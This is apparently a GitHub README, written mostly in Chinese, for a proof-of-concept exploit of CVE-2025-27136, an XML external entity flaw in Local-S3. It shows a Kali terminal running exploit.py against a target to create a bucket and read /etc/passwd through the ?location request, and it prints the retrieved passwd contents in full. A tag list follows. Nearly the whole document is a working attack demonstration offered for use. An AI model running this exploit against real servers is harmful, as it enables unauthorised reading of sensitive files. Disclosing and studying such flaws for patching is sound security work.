ZaidMkh32/CVE-2025-27136-XXE-LocalS3

# CVE-2025-27136 XXE-LocalS3 CVE-2025-27136 概念验证（Local-S3 中的 XXE） ┌──(kali㉿kali)-[~/Desktop/CVE-2025-27136] └─$ python3 exploit.py http://$ip:8080 /etc/passwd [+] 检测到 S3 服务 [+] 正在创建存储桶：xxe-32d14993 [+] 服务器响应： ac3aaf20-e59a-4705-9505-3ebb01db7fc1 [+] 通过 ?location 获取文件 [+] 响应： root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin

标签：0day, CVE-2025-27136, HTTP工具, Local-S3, Maven, OPA, PoC, Python, S3存储, XML外部实体注入, XXE, XXE攻击, 任意文件读取, 文件读取, 无后门, 暴力破解, 本地云, 漏洞验证, 网络安全, 逆向工具, 隐私保护, 靶场